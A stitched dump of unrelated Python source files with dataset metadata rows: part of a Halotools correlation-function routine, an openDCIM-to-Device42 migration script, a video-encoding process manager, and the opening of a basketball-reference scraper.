in which case ``randoms`` must be provided.
Length units are comoving and assumed to be in Mpc/h, here and throughout Halotools.
do_auto : boolean, optional
Boolean determines whether the auto-correlation function will
be calculated and returned. Default is True.
do_cross : boolean, optional
Boolean determines whether the cross-correlation function will
be calculated and returned. Only relevant when ``sample2`` is also provided.
Default is True for the case where ``sample2`` is provided, otherwise False.
estimator : string, optional
Statistical estimator for the tpcf.
Options are 'Natural', 'Davis-Peebles', 'Hewett' , 'Hamilton', 'Landy-Szalay'
Default is ``Natural``.
num_threads : int, optional
Number of threads to use in calculation, where parallelization is performed
using the python ``multiprocessing`` module. Default is 1 for a purely serial
calculation, in which case a multiprocessing Pool object will
never be instantiated. A string 'max' may be used to indicate that
the pair counters should use all available cores on the machine.
approx_cell1_size : array_like, optional
Length-3 array serving as a guess for the optimal manner by how points
will be apportioned into subvolumes of the simulation box.
The optimum choice unavoidably depends on the specs of your machine.
Default choice is to use Lbox/10 in each dimension,
which will return reasonable result performance for most use-cases.
Performance can vary sensitively with this parameter, so it is highly
recommended that you experiment with this parameter when carrying out
performance-critical calculations.
approx_cell2_size : array_like, optional
Analogous to ``approx_cell1_size``, but for sample2. See comments for
``approx_cell1_size`` for details.
approx_cellran_size : array_like, optional
Analogous to ``approx_cell1_size``, but for randoms. See comments for
``approx_cell1_size`` for details.
RR_precomputed : array_like, optional
Array storing the number of RR-counts calculated in advance during
a pre-processing phase. Must have the same length as *len(rbins)*.
If the ``RR_precomputed`` argument is provided,
you must also provide the ``NR_precomputed`` argument.
Default is None.
NR_precomputed : int, optional
Number of points in the random sample used to calculate ``RR_precomputed``.
If the ``NR_precomputed`` argument is provided,
you must also provide the ``RR_precomputed`` argument.
Default is None.
seed : int, optional
Random number seed used to randomly downsample data, if applicable.
Default is None, in which case downsampling will be stochastic.
Returns
-------
correlation_function(s) : numpy.array
*len(rbins)-1* length array containing the correlation function :math:`\xi(r)`
computed in each of the bins defined by input ``rbins``.
.. math::
1 + \xi(r) \equiv \mathrm{DD}(r) / \mathrm{RR}(r),
If ``estimator`` is set to 'Natural'. :math:`\mathrm{DD}(r)` is the number
of sample pairs with separations equal to :math:`r`, calculated by the pair
counter. :math:`\mathrm{RR}(r)` is the number of random pairs with separations
equal to :math:`r`, and is counted internally using "analytic randoms" if
``randoms`` is set to None (see notes for an explanation), otherwise it is
calculated using the pair counter.
If ``sample2`` is passed as input
(and if ``sample2`` is not exactly the same as ``sample1``),
then three arrays of length *len(rbins)-1* are returned:
.. math::
\xi_{11}(r), \xi_{12}(r), \xi_{22}(r),
the autocorrelation of ``sample1``, the cross-correlation between ``sample1`` and
``sample2``, and the autocorrelation of ``sample2``, respectively.
If ``do_auto`` or ``do_cross`` is set to False,
the appropriate sequence of results is returned.
Notes
-----
For a higher-performance implementation of the tpcf function written in C,
see the Corrfunc code written by Manodeep Sinha, available at
https://github.com/manodeep/Corrfunc.
Examples
--------
For demonstration purposes we calculate the `tpcf` for halos in the
`~halotools.sim_manager.FakeSim`.
>>> from halotools.sim_manager import FakeSim
>>> halocat = FakeSim()
>>> x = halocat.halo_table['halo_x']
>>> y = halocat.halo_table['halo_y']
>>> z = halocat.halo_table['halo_z']
We transform our *x, y, z* points into the array shape used by the pair-counter by
taking the transpose of the result of `numpy.vstack`. This boilerplate transformation
is used throughout the `~halotools.mock_observables` sub-package:
>>> sample1 = np.vstack((x,y,z)).T
Alternatively, you may use the `~halotools.mock_observables.return_xyz_formatted_array`
convenience function for this same purpose, which provides additional wrapper
behavior around `numpy.vstack` such as placing points into redshift-space.
>>> rbins = np.logspace(-1, 1, 10)
>>> xi = tpcf(sample1, rbins, period=halocat.Lbox)
See also
--------
:ref:`galaxy_catalog_analysis_tutorial2`
"""
do_auto = do_auto1 or do_auto2
# check input arguments using clustering helper functions
function_args = (sample1, rbins, sample2, randoms, period,
do_auto, do_cross, estimator, num_threads,
approx_cell1_size, approx_cell2_size, approx_cellran_size,
RR_precomputed, NR_precomputed, seed)
# pass arguments in, and get out processed arguments, plus some control flow variables
(sample1, rbins, sample2, randoms, period,
do_auto, do_cross, num_threads,
_sample1_is_sample2, PBCs,
RR_precomputed, NR_precomputed) = _tpcf_process_args(*function_args)
# What needs to be done?
do_DD, do_DR, do_RR = tpcf_estimator_dd_dr_rr_requirements[estimator]
if RR_precomputed is not None:
# overwrite do_RR as necessary
do_RR = False
# How many points are there (for normalization purposes)?
N1 = len(sample1)
N2 = len(sample2)
if randoms is not None:
NR = len(randoms)
else:
# set the number of randoms equal to the number of points in sample1
# this is arbitrarily set, but must remain consistent!
if NR_precomputed is not None:
NR = NR_precomputed
else:
NR = N1
# count data pairs
D1D1, D1D2, D2D2 = _pair_counts(sample1, sample2, rbins, period,
num_threads, do_auto1, do_cross, do_auto2, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size)
# count random pairs
# split this up over a few because randoms is large
# TODO do they stack like this?
split_randoms = np.array_split(randoms, n_split, axis = 0)
D1R, D2R, RR = np.zeros((len(rbins))), np.zeros((len(rbins))), np.zeros((len(rbins)))
#D1Rs = []
for i, _rand in enumerate(split_randoms):
#print i,
# don't diff here until after!
_D1R, _D2R, _RR, = _random_counts(sample1, sample2, _rand, rbins,
period, PBCs, num_threads, do_RR, do_DR, _sample1_is_sample2,
approx_cell1_size, approx_cell2_size, approx_cellran_size, diff = False)
#D1Rs.append(_D1R)
if _D1R is not None:
D1R+=_D1R
if _D2R is not None:
D2R+=_D2R
if _RR is not None:
RR+=_RR
D1R=np.diff(D1R)
D2R=np.diff(D2R)
RR=np.diff(RR)
if RR_precomputed is not None:
RR = RR_precomputed
# run results through the estimator and return relavent/user specified results.
outputs = []
if do_auto1 or _sample1_is_sample2:
xi_11 = _TP_estimator(D1D1, D1R, RR, N1, N1, NR, NR, estimator)
outputs.append(xi_11)
if do_cross:
xi_12 = _TP_estimator(D1D2, D1R, RR, N1, N2, NR, NR, estimator)
outputs.append(xi_12)
if do_auto2:
xi_22 = _TP_estimator(D2D2, D2R, RR, N2, N2, NR, NR, estimator)
outputs.append(xi_22)
return outputs[0] if len(outputs) ==1 else tuple(outputs)
# overload to skip the xi_mm calculation
def jnpair_counts(sample1, sample2, j_index_1, j_index_2, N_sub_vol, rbins,
period, num_threads, do_auto1 = True, do_cross=False,do_auto2=False, _sample1_is_sample2=False):
"""
Count jackknife data pairs: DD
"""
if do_auto1 is True:
D1D1 = npairs_jackknife_3d(sample1, sample1, rbins, period=period,
jtags1=j_index_1, jtags2=j_index_1, N_samples=N_sub_vol,
num_threads=num_threads)
D1D1 = np.diff(D1D1, axis=1)
else:
D1D1 = None
D2D2 = None
if _sample1_is_sample2:
D1D2 = D1D1
D2D2 = D1D1
else:
if do_cross is True:
D1D2 = npairs_jackknife_3d(sample1, sample2, rbins, period=period,
jtags1=j_index_1, jtags2=j_index_2,
N_samples=N_sub_vol, num_threads=num_threads)
D1D2 = np.diff(D1D2, axis=1)
else:
D1D2 = None
if do_auto2 is True:
D2D2 = npairs_jackknife_3d(sample2, sample2, rbins, period=period,
jtags1=j_index_2, jtags2=j_index_2,
N_samples=N_sub_vol, num_threads=num_threads)
D2D2 = np.diff(D2D2, axis=1)
else:
D2D2 = None
return D1D1, D1D2, D2D2
def _pair_counts(sample1, sample2, rbins,
period, num_threads, do_auto1, do_cross, do_auto2,
_sample1_is_sample2, approx_cell1_size, approx_cell2_size):
r"""
Internal function used calculate DD-pairs during the calculation of the tpcf.
"""
if do_auto1 is True:
D1D1 = npairs_3d(sample1, sample1, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell1_size,
approx_cell2_size=approx_cell1_size)
D1D1 = np.diff(D1D1)
else:
D1D1 = None
D2D2 = None
if _sample1_is_sample2:
D1D2 = D1D1
D2D2 = D1D1
else:
if do_cross is True:
D1D2 = npairs_3d(sample1, sample2, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell1_size,
approx_cell2_size=approx_cell2_size)
D1D2 = np.diff(D1D2)
else:
D1D2 = None
if do_auto2 is True:
D2D2 = npairs_3d(sample2, sample2, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell2_size,
approx_cell2_size=approx_cell2_size)
D2D2 = np.diff(D2D2)
else:
D2D2 = None
return D1D1, D1D2, D2D2
def _random_counts(sample1, sample2, randoms, rbins, period, PBCs, num_threads,
do_RR, do_DR, _sample1_is_sample2, approx_cell1_size,
approx_cell2_size, approx_cellran_size, diff = True):
r"""
Internal function used to random pairs during the calculation of the tpcf.
There are two high level branches:
1. w/ or wo/ PBCs and randoms.
2. PBCs and analytical randoms
There is also control flow governing whether RR and DR pairs are counted,
as not all estimators need one or the other.
Analytical counts are N**2*dv*rho, where dv is the volume of the spherical
shells, which is the correct volume to use for a continious cubical volume with PBCs.
Adding a function to do the diff after so you can split it up a little better
"""
def nball_volume(R, k=3):
"""
Calculate the volume of a n-shpere.
This is used for the analytical randoms.
"""
return (np.pi**(k/2.0)/gamma(k/2.0+1.0))*R**k
# randoms provided, so calculate random pair counts.
if randoms is not None:
if do_RR is True:
RR = npairs_3d(randoms, randoms, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cellran_size,
approx_cell2_size=approx_cellran_size)
if diff:
RR = np.diff(RR)
else:
RR = None
if do_DR is True:
D1R = npairs_3d(sample1, randoms, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell1_size,
approx_cell2_size=approx_cellran_size
)
if diff:
D1R = np.diff(D1R)
else:
D1R = None
if _sample1_is_sample2:
D2R = None
else:
if do_DR is True:
D2R = npairs_3d(sample2, randoms, rbins, period=period,
num_threads=num_threads,
approx_cell1_size=approx_cell2_size,
approx_cell2_size=approx_cellran_size)
if diff:
D2R = np.diff(D2R)
else:
D2R = None
return D1R, D2R, RR
# PBCs and no randoms--calculate randoms analytically.
elif randoms is None:
# set the number of randoms equal to the number of points in sample1
NR = len(sample1)
# do volume calculations
v = nball_volume(rbins) # volume of spheres
dv = np.diff(v) # volume of shells
global_volume = period.prod() # volume of simulation
# calculate randoms for sample1
N1 = np.shape(sample1)[0] # number of points in sample1
rho1 = N1/global_volume # number density of points
D1R = (NR)*(dv*rho1) # random counts are N**2*dv*rho
# calculate randoms for sample2
N2 = np.shape(sample2)[0] # number of points in sample2
rho2 = N2/global_volume # number density of points
D2R = (NR)*(dv*rho2) # random counts are N**2*dv*rho
# calculate the random-random pairs.
rhor = (NR**2)/global_volume
RR = (dv*rhor)
return D1R, D2R, RR
| mit | 554,307,896,365,136,200 | 40.785171 | 117 | 0.629282 | false | 3.350968 | false | false | false |
device42/OpenDCIM-to-Device42-Migration | opendcim2d42.py | 1 | 19438 | #!/usr/bin/env python
# -*- coding: utf-8 -*-
"""
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
import re
import sys
import pymysql as sql
import codecs
import requests
import base64
import random
import json
# ========================================================================
# IMPORTANT !!!
# Devices that are not based on device template are not going to be migrated
# * TemplateID (openDCIM) == Hardware Model (Device42)
# Racks without height, are not going to be migrated
# ========================================================================
# ====== MySQL Source (openDCIM) ====== #
DB_IP = ''
DB_PORT = ''
DB_NAME = ''
DB_USER = ''
DB_PWD = ''
# ====== Log settings ==================== #
LOGFILE = 'migration.log'
DEBUG = True
# ====== Device42 upload settings ========= #
D42_USER = ''
D42_PWD = ''
D42_URL = 'https://'
DRY_RUN = False
def is_valid_ip(ip):
"""Validates IP addresses.
"""
return is_valid_ipv4(ip) or is_valid_ipv6(ip)
def is_valid_ipv4(ip):
"""Validates IPv4 addresses.
"""
pattern = re.compile(r"""
^
(?:
# Dotted variants:
(?:
# Decimal 1-255 (no leading 0's)
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2} # Hexadecimal 0x0 - 0xFF (possible leading 0's)
|
0+[1-3]?[0-7]{0,2} # Octal 0 - 0377 (possible leading 0's)
)
(?: # Repeat 0-3 times, separated by a dot
\.
(?:
[3-9]\d?|2(?:5[0-5]|[0-4]?\d)?|1\d{0,2}
|
0x0*[0-9a-f]{1,2}
|
0+[1-3]?[0-7]{0,2}
)
){0,3}
|
0x0*[0-9a-f]{1,8} # Hexadecimal notation, 0x0 - 0xffffffff
|
0+[0-3]?[0-7]{0,10} # Octal notation, 0 - 037777777777
|
# Decimal notation, 1-4294967295:
429496729[0-5]|42949672[0-8]\d|4294967[01]\d\d|429496[0-6]\d{3}|
42949[0-5]\d{4}|4294[0-8]\d{5}|429[0-3]\d{6}|42[0-8]\d{7}|
4[01]\d{8}|[1-3]\d{0,9}|[4-9]\d{0,8}
)
$
""", re.VERBOSE | re.IGNORECASE)
return pattern.match(ip) is not None
def is_valid_ipv6(ip):
"""Validates IPv6 addresses.
"""
pattern = re.compile(r"""
^
\s* # Leading whitespace
(?!.*::.*::) # Only a single whildcard allowed
(?:(?!:)|:(?=:)) # Colon iff it would be part of a wildcard
(?: # Repeat 6 times:
[0-9a-f]{0,4} # A group of at most four hexadecimal digits
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
){6} #
(?: # Either
[0-9a-f]{0,4} # Another group
(?:(?<=::)|(?<!::):) # Colon unless preceeded by wildcard
[0-9a-f]{0,4} # Last group
(?: (?<=::) # Colon iff preceeded by exacly one colon
| (?<!:) #
| (?<=:) (?<!::) : #
) # OR
| # A v4 address with NO leading zeros
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
(?: \.
(?:25[0-4]|2[0-4]\d|1\d\d|[1-9]?\d)
){3}
)
\s* # Trailing whitespace
$
""", re.VERBOSE | re.IGNORECASE | re.DOTALL)
return pattern.match(ip) is not None
class Logger():
def __init__(self, logfile):
self.logfile = LOGFILE
def writer(self, msg):
if LOGFILE and LOGFILE != '':
with codecs.open(self.logfile, 'a', encoding = 'utf-8') as f:
f.write(msg.strip()+'\r\n') # \r\n for notepad
try:
print msg
except:
print msg.encode('ascii', 'ignore') + ' # < non-ASCII chars detected! >'
class REST():
def __init__(self):
self.password = D42_PWD
self.username = D42_USER
self.base_url = D42_URL
self.racks = json.loads(self.get_racks())
def uploader(self, data, url):
payload = data
headers = {
'Authorization': 'Basic ' + base64.b64encode(self.username + ':' + self.password),
'Content-Type': 'application/x-www-form-urlencoded'
}
r = requests.post(url, data=payload, headers=headers, verify=False)
msg = 'Status code: %s' % str(r.status_code)
logger.writer(msg)
if DEBUG:
msg = unicode(payload)
logger.writer(msg)
msg = str(r.text)
logger.writer(msg)
def fetcher(self, url):
headers = {
'Authorization': 'Basic ' + base64.b64encode(self.username + ':' + self.password),
'Content-Type': 'application/x-www-form-urlencoded'
}
r = requests.get(url, headers=headers, verify=False)
msg = 'Status code: %s' % str(r.status_code)
logger.writer(msg)
if DEBUG:
msg = str(r.text)
logger.writer(msg)
return r.text
def post_ip(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/ip/'
msg = '\r\nPosting IP data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_device(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/device/'
msg = '\r\nPosting device data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_location(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/buildings/'
msg = '\r\nPosting location data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_room(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/rooms/'
msg = '\r\nPosting room data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_rack(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/racks/'
msg = '\r\nPosting rack data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_pdu(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdus/'
msg = '\r\nPosting PDU data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_pdu_update(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdus/rack/'
msg = '\r\nUpdating PDU data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_pdu_model(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdu_models/'
msg = '\r\nPosting PDU models from %s ' % url
logger.writer(msg)
self.uploader(data, url)
def get_pdu_models(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/pdu_models/'
msg = '\r\nFetching PDU models from %s ' % url
logger.writer(msg)
self.fetcher(url)
def get_racks(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/racks/'
msg = '\r\nFetching racks from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def get_rack_by_name(self, name):
for rack in self.racks['racks']:
if rack['name'] == name:
return rack
return None
def get_devices(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/devices/'
msg = '\r\nFetching devices from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def get_buildings(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/buildings/'
msg = '\r\nFetching buildings from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def get_rooms(self):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/rooms/'
msg = '\r\nFetching rooms from %s ' % url
logger.writer(msg)
data = self.fetcher(url)
return data
def post_hardware(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/hardwares/'
msg = '\r\nAdding hardware data to %s ' % url
logger.writer(msg)
self.uploader(data, url)
def post_device2rack(self, data):
if DRY_RUN == False:
url = self.base_url+'/api/1.0/device/rack/'
msg = '\r\nAdding device to rack at %s ' % url
logger.writer(msg)
self.uploader(data, url)
class DB():
def __init__(self):
self.con = None
self.tables = []
self.datacenters_dcim = {}
self.rooms_dcim = {}
self.racks_dcim = {}
self.manufacturers = {}
def connect(self):
self.con = sql.connect(host=DB_IP, port=int(DB_PORT), db=DB_NAME, user=DB_USER, passwd=DB_PWD)
def get_ips(self):
net = {}
adrese = []
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = "SELECT PrimaryIP FROM fac_Device"
cur.execute(q)
ips = cur.fetchall()
for line in ips:
if line[0] != '':
ip = line[0]
if is_valid_ip(ip):
net.update({'ipaddress':ip})
rest.post_ip(net)
with self.con:
cur = self.con.cursor()
q = "SELECT IPAddress FROM fac_PowerDistribution"
cur.execute(q)
ips = cur.fetchall()
for line in ips:
if line[0] != '':
ip = line[0]
if is_valid_ip(ip):
net.update({'ipaddress':ip})
rest.post_ip(net)
def get_locations(self):
building = {}
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT DatacenterID,Name,DeliveryAddress,Administrator FROM fac_DataCenter'
cur.execute(q)
data = cur.fetchall()
for row in data:
#building.clear()
id, name, address, contact = row
building.update({'name':name})
building.update({'address':address})
building.update({'contact_name':contact})
self.datacenters_dcim.update({id:name})
rest.post_location(building)
def get_rooms(self):
rooms = {}
# get building IDs from D42
building_map = {}
buildings = json.loads(rest.get_buildings())
for building in buildings['buildings']:
building_map.update({building['name']:building['building_id']})
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT ZoneID,DataCenterID,Description FROM fac_Zone'
cur.execute(q)
data = cur.fetchall()
for row in data:
room_id = row[0]
dc = row[1]
name = row[2]
dc = self.datacenters_dcim[dc]
dc_id = building_map[dc]
rooms.update({'name':name})
rooms.update({'building_id':dc_id})
self.rooms_dcim.update({room_id:name})
rest.post_room(rooms)
def get_racks(self):
# get room IDs from D42
room_map = {}
rooms = json.loads(rest.get_rooms())
for room in rooms['rooms']:
room_map.update({room['name']:room['room_id']})
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT CabinetID,DatacenterID,Location,CabinetHeight,ZoneID FROM fac_Cabinet'
cur.execute(q)
data = cur.fetchall()
for row in data:
rack = {}
cid, did, name, height, room = row
dc = self.datacenters_dcim[did]
if height != 0:
if name == '':
rnd = str(random.randrange(101,9999))
name = 'Unknown'+rnd
if room > 0:
room = self.rooms_dcim[room]
room_id = room_map[room]
rack.update({'room_id':room_id})
d42_rack = rest.get_rack_by_name(name)
if d42_rack:
rack.update({'rack_id':d42_rack['rack_id']})
rack.update({'name':name})
rack.update({'size':height})
rack.update({'building':did})
self.racks_dcim.update({cid:name})
rest.post_rack(rack)
def get_datacenter_from_id(self, id):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT Name FROM fac_DataCenter where DataCenterID = %d' % id
cur.execute(q)
data = cur.fetchone()
return data
def get_room_from_cabinet(self, cabinetID):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT DatacenterID,Location,Model FROM fac_Cabinet where CabinetID = %d' % cabinetID
cur.execute(q)
data = cur.fetchone()
id, room, model = data
datacenter = self.get_datacenter_from_id(id)[0]
return datacenter, room, model
def get_vendor_and_model(self, id):
self.get_manufacturers()
hardware = {}
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT ManufacturerID, Model FROM fac_DeviceTemplate WHERE TemplateID=%d' % id
cur.execute(q)
data = cur.fetchone()
try:
id, model = data
except TypeError:
return None, None
vendor = self.manufacturers[id]
return vendor, model
def get_devices(self):
device = {}
device2rack = {}
hardware = {}
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT Label, SerialNo, AssetTag, PrimaryIP, Cabinet,Position,Height,DeviceType,HalfDepth,BackSide, TemplateID FROM fac_Device'
cur.execute(q)
data = cur.fetchall()
for row in data:
name, serial_no, comment, ip, rackid, position, size, devicetype, halfdepth, backside, tid = row
datacenter, room, rack_name = self.get_room_from_cabinet(rackid)
vendor, model = self.get_vendor_and_model(tid)
# post device
device.update({'name':name})
device.update({'manufacturer':vendor})
device.update({'hardware':model})
device.update({'notes':comment})
if devicetype.lower() == 'cdu':
device.update({'pdu_model':model})
rest.post_pdu(device)
else:
device.update({'serial_no':serial_no})
if devicetype.lower() == 'switch':
device.update({'is_it_switch':'yes'})
rest.post_device(device)
if rackid:
#post device 2 rack
device2rack.update({'device':name})
device2rack.update({'size':size})
#device2rack.update({'building':datacenter})
#device2rack.update({'room':room})
device2rack.update({'rack': self.racks_dcim[rackid]})
device2rack.update({'start_at':position-1})
if backside == '1':
device2rack.update({'orientation':'back'})
rest.post_device2rack(device2rack)
def get_manufacturers(self):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT ManufacturerID, Name from fac_Manufacturer'
cur.execute(q)
data = cur.fetchall()
for row in data:
id, vendor = row
self.manufacturers.update({id:vendor})
def get_depth(self, id):
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT HalfDepth FROM fac_Device WHERE TemplateID=%d' % id
cur.execute(q)
data = cur.fetchone()
d = data[0]
if d == 0:
return 1
elif d ==1:
return 2
def get_hardware(self):
self.get_manufacturers()
hardware = {}
if not self.con:
self.connect()
with self.con:
cur = self.con.cursor()
q = 'SELECT TemplateID, ManufacturerID, Model, Height, Wattage, DeviceType, FrontPictureFile, RearPictureFile FROM fac_DeviceTemplate'
cur.execute(q)
data = cur.fetchall()
for row in data:
TemplateID, ManufacturerID, Model, Height, Wattage, DeviceType, FrontPictureFile, RearPictureFile = row
try:
depth = self.get_depth(TemplateID)
except TypeError:
continue
vendor = self.manufacturers[ManufacturerID]
hardware.update({'name':Model})
hardware.update({'size':Height})
hardware.update({'depth':depth})
hardware.update({'manufacturer':vendor})
hardware.update({'watts':Wattage})
if DeviceType.lower() == 'cdu':
rest.post_pdu_model(hardware)
else:
hardware.update({'type':1})
'''
# to do
if FrontPictureFile:
hardware.update({'front_image':FrontPictureFile})
if RearPictureFile:
hardware.update({'back_image':RearPictureFile})
'''
rest.post_hardware(hardware)
def main():
db = DB()
db.get_ips()
db.get_locations()
db.get_rooms()
db.get_racks()
db.get_hardware()
db.get_devices()
if __name__ == '__main__':
logger = Logger(LOGFILE)
rest = REST()
main()
print '\n[!] Done!'
sys.exit()
| bsd-2-clause | 3,975,270,395,107,543,600 | 32.001698 | 146 | 0.485441 | false | 3.758314 | false | false | false |
dhardtke/pyEncode | app/modules/mod_process/process_repository.py | 1 | 7493 | import os
import re
from app import db, config, socketio, app
from app.library.formatters import formatted_file_data
from app.models.file import File
from app.models.package import Package
from app.modules.mod_process.file_repository import FileRepository
from app.modules.mod_process.status_map import StatusMap
class ProcessRepository:
# this dict holds all the currently active processes as id-instance pairs
# example: {1: <...>, 2: <...>, ...}
processes = {}
# this controls whether or not the encoding processing is active
# notice: do not modify this directly, but use set_encoding_active()
encoding_active = False
@staticmethod
def set_encoding_active(new_state):
"""
change the state of whether encoding should be active or not to a new state
:param new_state: should the encoding be active now
"""
ProcessRepository.encoding_active = new_state
# notify client
socketio.emit("active_changed", {"active": new_state})
# check if it's necessary to start new processes
ProcessRepository.check_and_start_processes()
@staticmethod
def cancel_all_processes():
"""
cancel all currently running Processes
"""
# iterate over a copy of processes because cancel_process modifies the dictionary
# while we are iterating over it
for file_id in ProcessRepository.processes.copy():
ProcessRepository.cancel_process(file_id)
@staticmethod
def is_running(file_id):
return file_id in ProcessRepository.processes
@staticmethod
def cancel_process(file_id):
"""
cancel a specific Process
:param file_id: the id of the file corresponding to the Process
"""
# stop thread
ProcessRepository.processes[file_id].stop()
# update status
file = File.query.filter_by(id=file_id).first()
file.status = StatusMap.failed.value
file.clear()
db.session.commit()
# emit file_done event
socketio.emit("file_done", {"data": formatted_file_data(file)})
# remove from processes dict
ProcessRepository.processes.pop(file_id)
@staticmethod
def check_and_start_processes():
"""
check if it's required to start new Processes and do so if needed
"""
while ProcessRepository.encoding_active:
# grab next potential file to process
file = FileRepository.get_queued_query().order_by(Package.position.asc(), File.position.asc()).first()
if file is None or ProcessRepository.count_processes_active() >= config["general"].getint(
"parallel_processes"):
break
# update file.status in DB
file.status = StatusMap.processing.value
db.session.commit()
# start the Process
from app.modules.mod_process.process import Process
process = Process(file)
process.daemon = True
# todo debug
# file.status = 0
# db.session.commit()
# ProcessRepository.encoding_active = False
# add to "processes" dict
ProcessRepository.processes[file.id] = process
process.start()
# emit file_started event
data = formatted_file_data(file)
data["count_active"] = ProcessRepository.count_processes_active()
data["count_queued"] = ProcessRepository.count_processes_queued()
socketio.emit("file_started", {"data": data})
@staticmethod
def count_processes_active():
"""
:return: the amount of processes currently active
"""
return len(ProcessRepository.processes)
@staticmethod
def count_processes_queued():
"""
:return: the amount of Files currently queued
"""
return FileRepository.get_queued_query().count()
@staticmethod
def count_processes_total():
"""
:return: count of all Files that are in packages that are queued
"""
# return ProcessRepository.count_processes_active() + ProcessRepository.count_processes_queued()
return Package.query.filter_by(queue=True).join(File).count()
# TODO
@staticmethod
def file_done(file):
"""
will be called whenever a Process is finished
:param file: the File object of the File that is done
"""
# delete from "processes"
ProcessRepository.processes.pop(file.id)
# remove original file from disk if desired
if config.getboolean("encoding", "delete_old_file"):
os.remove(file.filename)
# rename file if desired
if config.getboolean("encoding", "rename_enabled"):
rename_search = config.get("encoding", "rename_search")
rename_replace = config.get("encoding", "rename_replace")
# get pathinfo
pathinfo = os.path.split(file.filename)
path = pathinfo[0]
old_filename = pathinfo[1]
# only rename if match occurs
if re.match(rename_search, old_filename):
new_filename = re.sub(rename_search, rename_replace, old_filename)
# rename output_filename (created by ffmpeg, see process.py) to new_filename
os.rename(path + os.sep + file.output_filename, path + os.sep + new_filename)
# update status to "finished"
db.session.query(File).filter_by(id=file.id).update(dict(status=StatusMap.finished.value))
db.session.commit()
# check if it's necessary to start new processes
ProcessRepository.check_and_start_processes()
# notify client
socketio.emit("file_done", {
"data": {
"id": file.id,
"count_active": ProcessRepository.count_processes_active(),
"count_queued": ProcessRepository.count_processes_queued(),
"count_total": ProcessRepository.count_processes_total(),
}
})
app.logger.debug("Done with encoding of %s" % file.filename)
@staticmethod
def file_failed(file):
"""
will be called whenever a File fails
:param file: the File object of the File that has failed
"""
# delete from "processes"
ProcessRepository.processes.pop(file.id)
# update status and set attributes to zero
file = db.session.query(File).filter_by(id=file.id).first()
file.status = StatusMap.failed.value
file.clear()
db.session.commit()
# check if it's necessary to start new processes
ProcessRepository.check_and_start_processes()
# notify client
socketio.emit("file_done", {
"data": {
"id": file.id,
"count_active": ProcessRepository.count_processes_active(),
"count_queued": ProcessRepository.count_processes_queued(),
"count_total": ProcessRepository.count_processes_total(),
}
})
@staticmethod
def file_progress(file):
"""
will be called whenever a file makes progress
:param file: the File object of the File that has made progress
"""
# format data
info = formatted_file_data(file)
socketio.emit("file_progress", {"data": info})
| mit | 5,981,169,389,569,720,000 | 32.302222 | 114 | 0.609369 | false | 4.5193 | true | false | false |
sansbacon/nba | bbref.py | 1 | 15408 | # bbref.py
import datetime
import logging
import re
from string import ascii_lowercase
from bs4 import BeautifulSoup
from dateutil.parser import *
from nba.scraper import BasketballScraper
from nba.dates import datetostr
from nba.names import fuzzy_match
from nba.pipelines.bbref import *
from nba.player.nbacom import *
class Scraper(BasketballScraper):
'''
'''
def __init__(self, headers=None, cookies=None, cache_name=None):
'''
Args:
headers:
cookies:
cache_name:
'''
logging.getLogger(__name__).addHandler(logging.NullHandler())
BasketballScraper.__init__(self, headers=headers, cookies=cookies, cache_name=cache_name)
def players(self, initial):
'''
Returns:
content: dict with keys of alphabet
'''
